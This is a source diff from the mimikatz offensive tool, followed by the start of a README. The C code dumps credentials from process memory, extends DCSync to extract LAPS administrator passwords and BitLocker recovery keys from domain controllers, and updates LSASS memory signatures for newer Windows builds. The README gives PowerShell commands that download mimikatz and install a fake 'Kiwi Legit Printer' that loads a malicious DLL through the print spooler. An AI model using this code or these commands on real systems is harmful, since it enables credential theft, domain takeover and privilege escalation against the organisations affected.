(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
&&
(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
)
{
// Domain is not mandatory here
kprintf(L"\n * Web Credentials? *\n");
ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
if(
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
&&
(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
)
{
pWebKiwiData->Domain.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Domain.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Domain, aProcess.hMemory))
{
kprintf(L" Domain : %wZ\n", &pWebKiwiData->Domain);
LocalFree(pWebKiwiData->Domain.Buffer);
}
}
pWebKiwiData->Username.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Username.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Username, aProcess.hMemory))
{
kprintf(L" UserName : %wZ\n", &pWebKiwiData->Username);
LocalFree(pWebKiwiData->Username.Buffer);
}
pWebKiwiData->Password.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Password.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Password, aProcess.hMemory))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pWebKiwiData->Password.Buffer, pWebKiwiData->Password.Length, CRYPTPROTECTMEMORY_SAME_PROCESS);
if(decStatus)
{
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
}
else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
LocalFree(pWebKiwiData->Password.Buffer);
}
}
}

View File

@ -10,6 +10,7 @@
#include "../../modules/kull_m_process.h"
#include "../../modules/kull_m_memory.h"
#include "../../modules/kull_m_crypto_remote.h"
#include "sekurlsa/kuhl_m_sekurlsa.h"
const KUHL_M kuhl_m_ts;
@ -228,6 +229,14 @@ typedef struct _WTS_KIWI {
} WTS_KIWI, *PWTS_KIWI;
#pragma pack(pop)
typedef struct _WTS_WEB_KIWI {
DWORD dwVersion;
UNICODE_STRING Domain;
UNICODE_STRING Username;
UNICODE_STRING Password;
//BYTE Data[ANYSIZE_ARRAY];
} WTS_WEB_KIWI, *PWTS_WEB_KIWI;
typedef struct _TS_PROPERTY_KIWI {
PCWSTR szProperty;
DWORD dwType;

View File

@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
szOID_ANSI_currentValue,
szOID_isDeleted,
@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
szOID_ANSI_userAccountControl,
szOID_ANSI_unicodePwd,
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
szOID_ANSI_currentValue,
szOID_isDeleted,
};
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
@ -35,7 +38,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_HANDLE hDrs = NULL;
DSNAME dsName = {0};
DRS_MSG_GETCHGREQ getChReq = {0};
DWORD dwOutVersion = 0, i, AuthnSvc;
DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
DRS_MSG_GETCHGREPLY getChRep;
ULONG drsStatus;
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
@ -43,6 +46,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_EXTENSIONS_INT DrsExtensionsInt;
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
PWCHAR dn;
PLDAP ld;
ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
@ -68,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
{
if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
{
if(
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
&&
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
)
{
if(SuppATT_IntId[0] && SuppATT_IntId[1])
{
suppAtt = 2;
}
}
LocalFree(dn);
ldap_unbind(ld);
}
}
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
{
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
@ -82,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
{
getChReq.V8.pPartialAttrSet->dwVersion = 1;
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
if(allData)
{
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
@ -98,6 +126,13 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
}
if(suppAtt)
{
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
}
RpcTryExcept
{
do
@ -116,7 +151,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
if(csvOutput)
kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
else
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
pObject = pObject->pNextEntInf;
}
}
@ -166,6 +201,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
{
BOOL status = FALSE;
PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
DWORD ret;
PLDAPMessage pMessage = NULL, pEntry;
PBERVAL *pId;
PSTR tmpString;
ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
if(ret == LDAP_SUCCESS)
{
if(ldap_count_entries(ld, pMessage) == 1)
{
if(pEntry = ldap_first_entry(ld, pMessage))
{
kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
if(pId && pId[0])
{
if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
{
RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
*pIntId = strtol(tmpString, NULL, 10);
kprintf(L"0x%08x\n", *pIntId);
status = TRUE;
LocalFree(tmpString);
}
}
else PRINT_ERROR(L"No values?\n");
}
}
else PRINT_ERROR(L"More than one entry?\n");
}
else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
if(pMessage)
{
ldap_msgfree(pMessage);
}
return status;
}
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
{
DWORD i;
@ -233,12 +313,15 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
}
}
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
{
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
kprintf(L"\n");
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
@ -292,7 +375,88 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
return target;
}
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
{
UNICODE_STRING uString = {0};
DWORD szData = 0;
PVOID data = 0;
GUID RecoveryGuid;
PWCHAR filename;
kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
{
kprintf(L"Volume GUID : ");
kull_m_string_displayGUID((LPCGUID) data);
kprintf(L"\n");
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
{
kprintf(L"Recovery GUID : ");
kull_m_string_displayGUID(&RecoveryGuid);
kprintf(L"\n");
}
else
{
UuidCreate(&RecoveryGuid);
if(someExport)
{
kprintf(L"Recovery GUID (fake) : ");
kull_m_string_displayGUID(&RecoveryGuid);
kprintf(L"\n");
}
}
if(someExport)
{
RtlStringFromGUID(&RecoveryGuid, &uString);
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
{
if(szData > 0)
{
kprintf(L"Recovery Password : %s\n", data);
if(someExport)
{
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
{
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
LocalFree(filename);
}
}
}
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
{
if(szData > 0)
{
kprintf(L"Key Package Size : %u byte(s)\nKey Package : [", szData);
kull_m_string_wprintf_hex(data, szData, 0);
kprintf(L"]\n");
if (someExport)
{
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
{
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
LocalFree(filename);
}
}
}
}
if (uString.Buffer)
{
RtlFreeUnicodeString(&uString);
}
}
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
{
DWORD rid = 0, i;
PBYTE encodedData;
@ -365,6 +529,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
kprintf(L"\nSupplemental Credentials:\n");
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
}
if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
{
kprintf(L"LAPS:\n");
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
{
kprintf(L" Password : %.*S\n", encodedDataSize, encodedData);
}
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
{
kprintf(L" Last change: ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
}
}
DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");
@ -2096,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
kprintf(L" uidOriginatingDsa:");
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
kprintf(L"\n");
}
kprintf(L"\n");
}
@ -3046,4 +3224,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
{
return STATUS_SUCCESS;
}
}

View File

@ -12,6 +12,8 @@
#include "../modules/rpc/kull_m_rpc_drsr.h"
#include "../kuhl_m.h"
#include "../kuhl_m_lsadump.h" // to move
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_ldap.h"
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@ -39,13 +41,15 @@ typedef struct _USER_PROPERTIES {
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);

View File

@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
{
if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
{
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
{
aRemote.address = containerManager.unk7;

View File

@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
kprintf(L"[UsernameForPacked] ?");
break;
default:
kprintf(L"[?] ?");
kprintf(L"[?] ? %u ?", type);
}
CredFree(Credential);
}

View File

@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
};
#elif defined(_M_IX86)
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};

View File

@ -6,7 +6,7 @@
#include "kuhl_m_sekurlsa_cloudap.h"
#if defined(_M_X64)
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
KULL_M_PATCH_GENERIC CloudApReferences[] = {
{KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}},
};
@ -35,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))

View File

@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
DWORD64 unk3;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD unk4;
DWORD unk5;
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;

166
mimispool/README.md Normal file
View File

@ -0,0 +1,166 @@
## PowerShell commands
### Server
#### install
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
```
#### uninstall
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
